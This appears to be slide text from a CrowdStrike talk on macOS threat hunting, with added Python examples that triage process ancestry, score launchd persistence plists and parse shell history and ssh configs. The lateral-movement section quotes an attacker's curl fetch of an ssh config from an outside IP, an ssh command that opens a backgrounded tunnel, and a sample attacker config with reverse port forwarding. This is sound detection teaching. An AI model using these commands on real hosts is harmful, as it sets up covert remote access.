2. `WHOAMI`
§ Incident Responder
§ Hunter
§ Detections Engineer
§ CrowdStrike SCAR Team
§ Author of OS X Incident Response: Scripting and Analysis
2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
3. MAC BASIC HUNTING OVERVIEW
4. THE IMPORTANCE OF THE PROCESS TREE
[Process tree diagram] Two trees that end in the same action, an edit to the sudoers file, but with different ancestry:
launchd -> jamf -> bash -> vim (Sudoers File Modified)
launchd -> /var/tmp/a -> bash -> vim (Sudoers File Modified)
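The two trees above look identical at the leaf (vim writing the sudoers file) and only separate once you walk the parents. The following is an added example, not code from the slides or from CrowdStrike: it builds the parent chain from constructed process records (pid, ppid, path) and flags an edit whose ancestry includes a binary running from a user-writable location such as /var/tmp. The process list, the untrusted-directory list and the verdict labels are this example's own assumptions.

```python
"""Ancestry triage for a sensitive file edit.

Added example, not from the slides or CrowdStrike. The process records are
constructed for the demo; on a real host they would come from EDR telemetry
or `ps -axo pid,ppid,comm`. The two chains mirror the slide: jamf is a
management agent, /var/tmp/a is an unknown binary in a world-writable dir.
"""
import os
from typing import Dict, List, Tuple

# Constructed sample telemetry: pid -> (ppid, executable path)
PROCESSES: Dict[int, Tuple[int, str]] = {
    1:   (0,   "/sbin/launchd"),
    300: (1,   "/usr/local/jamf/bin/jamf"),
    301: (300, "/bin/bash"),
    302: (301, "/usr/bin/vim"),   # jamf -> bash -> vim editing /etc/sudoers
    900: (1,   "/var/tmp/a"),
    901: (900, "/bin/bash"),
    902: (901, "/usr/bin/vim"),   # /var/tmp/a -> bash -> vim editing /etc/sudoers
}

# Locations any local user can write to (assumption for this example);
# an ancestor executing from one of these is a red flag.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/", "/private/var/tmp/",
                  "/Users/Shared/")


def ancestry(pid: int, procs: Dict[int, Tuple[int, str]] = PROCESSES) -> List[str]:
    """Executable paths from the process up to the root of the tree (launchd)."""
    chain: List[str] = []
    seen = set()
    while pid in procs and pid not in seen:   # 'seen' guards against ppid cycles in bad data
        seen.add(pid)
        ppid, path = procs[pid]
        chain.append(path)
        pid = ppid
    return chain


def render(chain: List[str]) -> str:
    """launchd-first rendering like the slide: 'launchd -> jamf -> bash -> vim'."""
    return " -> ".join(os.path.basename(p) for p in reversed(chain))


def triage_sudoers_edit(pid: int, procs=PROCESSES) -> Tuple[str, List[str]]:
    """Verdict for a process observed writing /etc/sudoers, based on its ancestry.

    'suspicious' if any ancestor ran from a user-writable location; otherwise
    'review' (a management agent such as jamf is expected, but still worth a look).
    Returns the verdict and the offending ancestor paths.
    """
    chain = ancestry(pid, procs)
    offenders = [p for p in chain if p.startswith(UNTRUSTED_DIRS)]
    return ("suspicious" if offenders else "review"), offenders


if __name__ == "__main__":
    for pid in (302, 902):
        verdict, offenders = triage_sudoers_edit(pid)
        print(f"{render(ancestry(pid))}: {verdict} {offenders}")
```

The check is deliberately on the whole chain rather than the immediate parent: bash is the parent in both trees, and only the grandparent tells the two apart.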
5. DETECTION/ANALYSIS DIFFICULTIES
§ All the commands an attacker could ever need are on the system
§ Admin and Attacker activity can look like the same thing
§ Backdoors can be written in many different languages
§ Malware sample size incredibly small compared to Windows
17. STANDARD ASEPS
§ System Integrity Protection (SIP) protected
§ /System/Library/LaunchAgents
§ /System/Library/LaunchDaemons
§ Root Level
§ /Library/LaunchAgents
§ /Library/LaunchDaemons
§ User Level
§ ~/Library/LaunchAgents
§ (there is no per-user LaunchDaemons directory; launchd does not load ~/Library/LaunchDaemons, and daemons run as root from the root-level paths above)
§ Some schedulers
§ cron
§ periodic
§ Mac malware has not reached the same level of creativity in hiding its ASEPs
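Because Mac persistence still clusters in the launchd directories above, a first-pass hunt is to summarize every job plist in them and score the obvious tells. The block below is an added example, not code from the slides or from CrowdStrike: it parses two constructed launchd plists with the standard library's plistlib, pulls out the label, program, RunAtLoad and KeepAlive, and applies scoring rules (program in a user-writable directory, hidden path component, interpreter with an inline -c payload, Apple-style label on a non-Apple binary) that are this example's own assumptions. scan_asep_dirs() applies the same summary to the real directories when run on a Mac.

```python
"""Summarize and score launchd persistence entries.

Added example, not from the slides or CrowdStrike. The two plists are
constructed for the demo and the scoring rules are this example's own
assumptions about what deserves a second look; scan_asep_dirs() applies the
same summary to the real directories when run on a Mac.
"""
import os
import plistlib
from pathlib import Path
from typing import Dict, List, Tuple

# The slide's directories; launchd loads no per-user LaunchDaemons directory.
ASEP_DIRS = [
    "/System/Library/LaunchAgents", "/System/Library/LaunchDaemons",  # SIP-protected
    "/Library/LaunchAgents", "/Library/LaunchDaemons",                # root level
    "~/Library/LaunchAgents",                                         # user level
]
# Heuristic lists (assumptions for this example)
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/", "/private/var/tmp/", "/Users/Shared/")
APPLE_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "osascript", "perl"}

# Constructed sample plists
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/agent</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

MALICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.updatecheck</string>
  <key>Program</key><string>/var/tmp/.cache/a</string>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""


def summarize_plist(data: bytes) -> Dict[str, object]:
    """Pull the fields a hunter cares about out of a launchd job plist (XML or binary)."""
    job = plistlib.loads(data)
    args = list(job.get("ProgramArguments") or [])
    program = job.get("Program") or (args[0] if args else None)
    return {"label": job.get("Label"), "program": program, "args": args,
            "run_at_load": bool(job.get("RunAtLoad", False)),
            "keep_alive": bool(job.get("KeepAlive", False))}


def suspicious_reasons(summary: Dict[str, object]) -> List[str]:
    """Return the scoring rules this entry trips (empty list means nothing obvious)."""
    reasons: List[str] = []
    prog = str(summary["program"] or "")
    label = str(summary["label"] or "")
    args = summary["args"]
    if prog.startswith(UNTRUSTED_DIRS):
        reasons.append(f"program in user-writable location: {prog}")
    if any(part.startswith(".") for part in prog.split("/") if part):
        reasons.append(f"hidden path component: {prog}")
    if os.path.basename(prog) in INTERPRETERS and "-c" in args:
        reasons.append("interpreter launched with inline -c payload")
    if label.startswith("com.apple.") and not prog.startswith(APPLE_PREFIXES):
        reasons.append(f"Apple-style label for non-Apple binary: {label} -> {prog}")
    return reasons


def scan_asep_dirs(dirs=ASEP_DIRS) -> List[Tuple[str, Dict[str, object], List[str]]]:
    """Summarize and score every *.plist under the given directories (missing dirs are skipped)."""
    findings = []
    for d in dirs:
        root = Path(d).expanduser()
        if not root.is_dir():
            continue
        for plist in root.glob("*.plist"):
            try:
                s = summarize_plist(plist.read_bytes())
            except Exception as exc:   # malformed files are themselves worth a look
                findings.append((str(plist), {"error": str(exc)}, ["unparseable plist"]))
                continue
            findings.append((str(plist), s, suspicious_reasons(s)))
    return findings


if __name__ == "__main__":
    for name, data in (("benign", BENIGN), ("malicious", MALICIOUS)):
        s = summarize_plist(data)
        print(name, s["label"], s["program"], suspicious_reasons(s))
    for path, s, reasons in scan_asep_dirs():
        if reasons:
            print(path, reasons)
```

Add cron and periodic to the same sweep by reading /usr/lib/cron/tabs and /etc/periodic on the host; they are plain text and need no plist parsing.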
25. LATERAL MOVEMENT
§ grep ssh .bash_history
§ cat known_hosts
§ curl -sO hxxp://61.78.62.21:8080/rs
§ ssh -TNfq -Frs
• -T -> Disable pseudo-tty allocation.
• -N -> Do not execute a remote command. This is useful for just forwarding ports (protocol version 2 only).
• -f -> Requests ssh to go to background just before command execution.
• -q -> Quiet mode; suppresses most warning and diagnostic messages.
• -F -> Specifies an alternative per-user configuration file. Here -Frs points ssh at the file rs that the preceding curl just fetched, so the remote host, any ProxyCommand and the port forwards live in that file rather than on the command line, where a history grep would show them.
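Pulling these clues out of a host at scale means parsing .bash_history for ssh/scp invocations (including a glued -Frs argument) and reading whatever config file -F points at. The block below is an added example, not code from the slides or from CrowdStrike. The history reuses the slide's two commands plus two constructed ssh/scp lines; the slide does not show the contents of rs, so RS_CONFIG is a hypothetical illustration of what an attacker could place in an ssh config passed with -F, and the indicator rules are this example's own assumptions.

```python
"""Mine shell history and ssh configuration for lateral-movement clues.

Added example, not from the slides or CrowdStrike. HISTORY reuses the
slide's two commands plus constructed ssh/scp lines; RS_CONFIG is a
hypothetical attacker-supplied ssh config (the slide does not show rs).
"""
import re
import shlex
from typing import Dict, List

HISTORY = """ls -la
ssh admin@10.0.0.5
scp backup.tgz deploy@build01:/tmp/
curl -sO hxxp://61.78.62.21:8080/rs
ssh -TNfq -Frs
"""

RS_CONFIG = """# hypothetical attacker-supplied ssh config (assumption for this example)
Host *
    HostName 61.78.62.21
    User relay
    StrictHostKeyChecking no
    UserKnownHostsFile /dev/null
    RemoteForward 2222 127.0.0.1:22
"""

# ssh options that take an argument, so the argument is not mistaken for the host
ARG_FLAGS = set("BbcDEeFIiJLlmOopQRSWw")
TUNNEL_KEYS = {"remoteforward", "localforward", "dynamicforward", "proxycommand"}


def parse_ssh_invocation(argv: List[str]) -> Dict[str, object]:
    """Split an ssh/scp/sftp argv into flag letters, target host and -F config file."""
    info = {"cmd": argv[0], "target": None, "config": None, "flags": []}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for pos, letter in enumerate(letters):
                info["flags"].append(letter)
                if letter in ARG_FLAGS:
                    rest = letters[pos + 1:]           # value glued on, as in -Frs
                    if not rest:
                        i += 1
                        rest = argv[i] if i < len(argv) else ""
                    if letter == "F":
                        info["config"] = rest
                    break
        elif info["target"] is None:
            if argv[0] == "scp" and ":" not in tok:   # local path, not the remote side
                i += 1
                continue
            info["target"] = tok.split(":")[0]
        i += 1
    return info


def ssh_activity(history: str) -> List[Dict[str, object]]:
    """Every ssh/scp/sftp command line in a shell history, parsed."""
    out = []
    for line in history.splitlines():
        try:
            argv = shlex.split(line)
        except ValueError:             # unbalanced quotes in a history line
            continue
        if argv and argv[0] in ("ssh", "scp", "sftp"):
            out.append(parse_ssh_invocation(argv))
    return out


def parse_ssh_config(text: str) -> Dict[str, Dict[str, str]]:
    """ssh_config -> {host pattern: {lowercased option: value}}; options before any Host go under '*'."""
    blocks: Dict[str, Dict[str, str]] = {}
    current = "*"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "host":
            current = value
            blocks.setdefault(current, {})
        else:
            blocks.setdefault(current, {})[key] = value
    return blocks


def tunnel_indicators(cfg: Dict[str, Dict[str, str]]) -> List[str]:
    """Config lines that turn a plain ssh into a tunnel or hide where it goes."""
    reasons = []
    for host, opts in cfg.items():
        for key, value in opts.items():
            if key in TUNNEL_KEYS:
                reasons.append(f"{host}: {key} {value}")
            elif key == "stricthostkeychecking" and value.lower() == "no":
                reasons.append(f"{host}: host key checking disabled")
            elif key == "userknownhostsfile" and value == "/dev/null":
                reasons.append(f"{host}: known_hosts discarded")
    return reasons


if __name__ == "__main__":
    for act in ssh_activity(HISTORY):
        print(act)
    print(tunnel_indicators(parse_ssh_config(RS_CONFIG)))
```

An ssh invocation with N and f in its flags and no target on the command line is only meaningful together with the -F file, so treat the config path the parser returns as the next artifact to collect; a UserKnownHostsFile of /dev/null also explains why the tunnel's endpoint never shows up in ~/.ssh/known_hosts.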